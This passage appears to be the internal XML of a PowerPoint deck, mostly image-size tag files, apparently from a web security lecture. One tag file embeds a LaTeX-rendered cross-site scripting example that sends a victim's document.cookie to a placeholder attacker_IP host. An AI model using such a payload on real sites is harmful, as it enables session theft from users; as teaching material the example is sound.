</p:tagLst>
</file>

<file path=ppt/tags/tag177.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag178.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag179.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag18.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.431818"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag180.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag181.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.284109"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag182.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.284109"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag183.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9659269"/>
  <p:tag name="ORIGINALWIDTH" val="0.9659269"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag184.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag185.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag186.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.920472"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag187.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag188.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag189.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag19.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="0.9659269"/>
  <p:tag name="ORIGINALWIDTH" val="0.9090909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag190.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.806836"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag191.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.920472"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag192.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag193.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag194.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.318182"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag195.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="3.806836"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag196.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag197.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag198.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.318182"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag199.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag2.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="34.77276"/>
  <p:tag name="ORIGINALWIDTH" val="224.5455"/>
  <p:tag name="LATEXADDIN" val="\documentclass{article}&#10;\usepackage{amsmath}&#10;\usepackage{upquote}&#10;\usepackage{alltt}&#10;\pagestyle{empty}&#10;\begin{document}&#10;&#10;\begin{alltt}&#10;&lt;script&gt;&#10;   document.write('&lt;img src=http://attacker_IP:5555?c=' + &#10;   secape(document.cookie) + '  &gt;');&#10;&lt;/script&gt;&#10;\end{alltt}&#10;&#10;&#10;\end{document}"/>
  <p:tag name="IGUANATEXSIZE" val="22"/>
  <p:tag name="IGUANATEXCURSOR" val="239"/>
  <p:tag name="TRANSPARENCY" val="True"/>
  <p:tag name="FILENAME" val=""/>
  <p:tag name="LATEXENGINEID" val="0"/>
  <p:tag name="TEMPFOLDER" val="C:\Temp\"/>
  <p:tag name="LATEXFORMHEIGHT" val="312"/>
  <p:tag name="LATEXFORMWIDTH" val="384"/>
  <p:tag name="LATEXFORMWRAP" val="True"/>
  <p:tag name="BITMAPVECTOR" val="1"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag20.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag200.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag201.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag202.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag203.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag204.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.75"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag205.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag206.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag207.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag208.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag209.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.9432"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag21.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag210.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.9432"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag211.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag212.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag213.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag214.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.227273"/>
  <p:tag name="ORIGINALWIDTH" val="3.579563"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag215.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="5.227273"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag216.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.920472"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag217.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="6.079563"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag218.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="3.693199"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag219.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.772727"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag22.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.829563"/>
  <p:tag name="ORIGINALWIDTH" val="2.840909"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag220.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.409091"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag221.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375018"/>
  <p:tag name="ORIGINALWIDTH" val="3.238654"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag222.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.409091"/>
  <p:tag name="ORIGINALWIDTH" val="3.806836"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag223.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.522727"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag224.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.715927"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag225.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.715927"/>
  <p:tag name="ORIGINALWIDTH" val="3.636364"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag226.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="3.125018"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag227.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.465927"/>
  <p:tag name="ORIGINALWIDTH" val="2.954545"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag228.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.375018"/>
  <p:tag name="ORIGINALWIDTH" val="3.181818"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag229.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="3.920472"/>
  <p:tag name="ORIGINALWIDTH" val="3.068182"/>
  <p:tag name="EMFCHILD" val="True"/>
</p:tagLst>
</file>

<file path=ppt/tags/tag23.xml><?xml version="1.0" encoding="utf-8"?>
<p:tagLst xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main">
  <p:tag name="ORIGINALHEIGHT" val="4.431818"/>
